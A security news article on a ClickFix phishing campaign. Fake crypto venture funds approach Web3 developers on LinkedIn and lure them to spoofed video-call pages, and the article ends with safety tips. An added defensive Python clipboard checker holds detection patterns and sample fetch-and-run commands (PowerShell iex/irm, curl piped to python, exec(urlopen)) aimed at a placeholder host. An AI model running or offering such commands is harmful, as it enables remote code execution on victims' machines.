Hackers Target Crypto Professionals Through Fake VC Funds and Spoofed Video Calls
Moonlock Lab uncovered a sophisticated campaign where attackers create fictitious crypto venture funds and use LinkedIn to reach Web3 developers, infecting their devices via the ClickFix technique.
Researchers at Moonlock Lab have uncovered a large-scale malicious campaign targeting Web3 developers and crypto professionals. The attackers impersonate venture capital representatives, identify victims through LinkedIn, and infect their computers using fake video conferencing services.
Fake Funds with AI-Generated Faces
To create an illusion of legitimacy, the hackers registered three fictitious crypto funds — SolidBit Capital, MegaBit, and Lumax Capital. Each fund has a professionally designed website featuring corporate history, an investment portfolio, and a leadership roster. The profile photos of supposed team members were generated by AI.

Using fake LinkedIn accounts, the scammers contact professionals while posing as senior executives of these funds. Conversations typically begin with flattery about the target's professional accomplishments, followed by a collaboration proposal.
Why This Matters
This campaign marks a significant escalation in social engineering sophistication within the crypto industry. Building entire ecosystems of fictitious companies — complete with websites, biographies, and portfolios — makes fraud detection considerably harder, even for seasoned professionals. The operation also bears hallmarks of threat groups that have systematically targeted crypto projects for years, raising concerns about state-sponsored involvement.
The ClickFix Infection Mechanism
Once rapport is established, the attackers move communication to messaging apps and propose a video call. The victim receives a Calendly link that redirects to a pixel-perfect clone of Zoom, Google Meet, or a similar service.
The spoofed site displays a Cloudflare-style verification prompt asking the user to check a box confirming they are not a bot. This is the core of the ClickFix technique: the click itself does nothing visible, but a script on the page silently writes a malicious command to the clipboard.

The site then shows an animated tutorial with a countdown timer, instructing the user to open a system terminal, paste the copied text, and hit Enter. The malicious code adapts to the operating system:
- Windows — a hidden process fetches and runs its payload directly in memory without writing a file to disk, so file-based antivirus scanning has nothing to inspect;
- macOS — the script checks whether Python is present, silently downloads the libraries it needs, and establishes persistence on the system.
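A defensive counterpart to the mechanism described above, added here as an example rather than code from Moonlock Lab or from the campaign itself: a small Python checker that inspects whatever is on the clipboard before it is pasted into a terminal and flags the command shapes this lure depends on (a PowerShell window forced hidden, remote content handed straight to Invoke-Expression, a Base64-encoded PowerShell command, a curl download piped into a shell or Python, and a python -c one-liner that fetches and exec()s code). Encoded PowerShell is decoded and re-scanned so the inner command is also checked. The sample payloads and the `meet-verify.example` hostname are constructed for illustration and are not the campaign's actual commands or infrastructure.

```python
"""Flag clipboard text that looks like a ClickFix 'paste this into your terminal' payload.

Added example, not code from Moonlock Lab or from the campaign. The samples below are
constructed to resemble the command shapes the article describes; 'meet-verify.example'
is a placeholder hostname, not real infrastructure.
"""
import base64
import re
import sys

# (rule name, pattern). Case-insensitive because PowerShell and its aliases are.
RULES = [
    # PowerShell started with its window forced hidden, so the victim sees nothing.
    ("powershell_hidden_window",
     re.compile(r"powershell(?:\.exe)?[^\n]*?-(?:w|win|windowstyle)\s+hidden", re.I)),
    # Remote content handed straight to Invoke-Expression: runs in memory, no file on disk.
    ("powershell_download_and_invoke",
     re.compile(r"\b(?:iex|invoke-expression)\b[^\n]*\b(?:irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring)\b"
                r"|\b(?:irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring)\b[^\n]*\b(?:iex|invoke-expression)\b", re.I)),
    # -EncodedCommand hides the real command behind Base64; decoded separately below.
    ("powershell_encoded_command",
     re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)),
    # curl/wget output piped into a shell or Python: the usual macOS/Linux one-liner.
    ("shell_pipe_to_interpreter",
     re.compile(r"\b(?:curl|wget)\b[^|\n]*\|\s*(?:sudo\s+)?(?:(?:ba|z|k)?sh|python3?)\b", re.I)),
    # python -c that both fetches from the network and exec()/eval()s the result.
    ("python_remote_exec",
     re.compile(r"python3?(?:\.exe)?\s+-c\b(?=.*\b(?:urlopen|requests\.get|socket\.socket)\b)(?=.*\b(?:exec|eval)\s*\()", re.I | re.S)),
    # Inline Base64 decoded and piped into a shell.
    ("base64_decode_to_shell",
     re.compile(r"base64\s+(?:-d|-D|--decode)\b[^|\n]*\|\s*(?:ba|z)?sh\b", re.I)),
]

_ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)


def decode_encoded_commands(text):
    """Return the decoded text of every PowerShell -EncodedCommand argument (Base64 of UTF-16LE)."""
    decoded = []
    for m in _ENCODED_ARG.finditer(text):
        try:
            decoded.append(base64.b64decode(m.group(1), validate=True).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            continue  # not valid Base64/UTF-16LE: the outer rule still flags the argument
    return decoded


def analyze_clipboard(text):
    """Return the sorted names of every rule that fires on the text or on a decoded layer of it."""
    hits = set()
    for layer in [text] + decode_encoded_commands(text):
        for name, pattern in RULES:
            if pattern.search(layer):
                hits.add(name)
    return sorted(hits)


def is_clickfix_like(text):
    return bool(analyze_clipboard(text))


# Constructed samples (placeholder hostname), shaped like the article's Windows and macOS payloads.
WINDOWS_SAMPLE = 'powershell -w hidden -c "iex (irm https://meet-verify.example/chk)"'
ENCODED_SAMPLE = "powershell -nop -ep bypass -enc " + base64.b64encode(
    "iex (irm https://meet-verify.example/chk)".encode("utf-16-le")).decode("ascii")
MAC_SAMPLE = ('/bin/bash -c "command -v python3 >/dev/null 2>&1 || echo python-missing; '
              'curl -fsSL https://meet-verify.example/mac.py | python3 -"')
PY_SAMPLE = ('python3 -c "import urllib.request as u;'
             "exec(u.urlopen('https://meet-verify.example/l').read())\"")
BENIGN_SAMPLE = "git clone https://github.com/example/repo.git && cd repo && npm install"

if __name__ == "__main__":
    if sys.stdin.isatty():
        for label, sample in [("windows", WINDOWS_SAMPLE), ("windows-encoded", ENCODED_SAMPLE),
                              ("macos", MAC_SAMPLE), ("macos-python", PY_SAMPLE), ("benign", BENIGN_SAMPLE)]:
            print(f"{label}: {analyze_clipboard(sample) or 'no indicators'}")
    else:  # e.g. `pbpaste | python3 clickfix_check.py` on macOS, before pasting into Terminal
        print(analyze_clipboard(sys.stdin.read()) or "no indicators")
```

Treat a hit as a reason to read the command, not as proof of malice: legitimate installers use the same `curl ... | bash` shape, which is exactly why the lure works. The rules are deliberately narrow pattern matches, so a payload that uses a different launcher or obfuscation will slip past them; the point is to force a pause before the paste, which is the one step the attacker cannot automate.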
In some cases, victims were instead sent a standalone macOS application that closely replicated the real Zoom interface. The program displayed a fake sign-in window, harvested the passwords entered into it, and forwarded them to a Telegram bot controlled by the attackers.
Links to North Korean Hackers
The domains for the spoofed websites were registered under the name Anatoly Bigdash from Boston, USA. Experts doubt this person actually exists.

Researchers identified significant tactical overlaps with UNC1069, a group that has been breaching crypto projects since 2018. Analysts at Mandiant have previously linked this group to North Korea. The similarities include identical malicious link structures and comparable deception scenarios involving fake video calls.
How to Stay Safe
Security practitioners recommend checking the registration dates of the domains associated with any new contact: a fund that claims years of operating history but whose website and meeting links sit on domains registered weeks ago is a red flag. No legitimate service asks users to paste terminal commands to verify their identity or to join a video call; a "verification" step that ends in a terminal is the attack itself. Most of these warning signs are visible at the point of following an external link, before anything has run.
In June 2025, Hypersphere venture firm investment partner Mehdi Farooq fell victim to a similar phishing attack via a spoofed Zoom call.
Frequently Asked Questions
What is the ClickFix attack technique?
ClickFix is a social engineering method where a fake verification button (such as a Cloudflare captcha) silently copies malicious code to the user's clipboard. The victim is then instructed to paste and execute this code in their system terminal.
Which fake venture capital funds were created by the hackers?
The attackers set up three fictitious crypto funds: SolidBit Capital, MegaBit, and Lumax Capital. Each had a professional website with corporate history, investment portfolios, and AI-generated team photos.
Is there a North Korea connection to crypto phishing attacks?
Moonlock Lab researchers found significant tactical overlaps with UNC1069, a group that has targeted crypto projects since 2018. Mandiant analysts have previously linked this group to North Korea.
How to protect yourself from fake video call phishing?
Security experts recommend checking the domain registration dates of any new contact's website and meeting links. No legitimate service asks users to enter terminal commands for identity verification or to start a video call.
How do hackers find crypto professional victims on LinkedIn?
Scammers create fake LinkedIn profiles, posing as senior executives of fictitious investment funds. They initiate conversations by praising the target's professional achievements before proposing collaboration and scheduling a video call.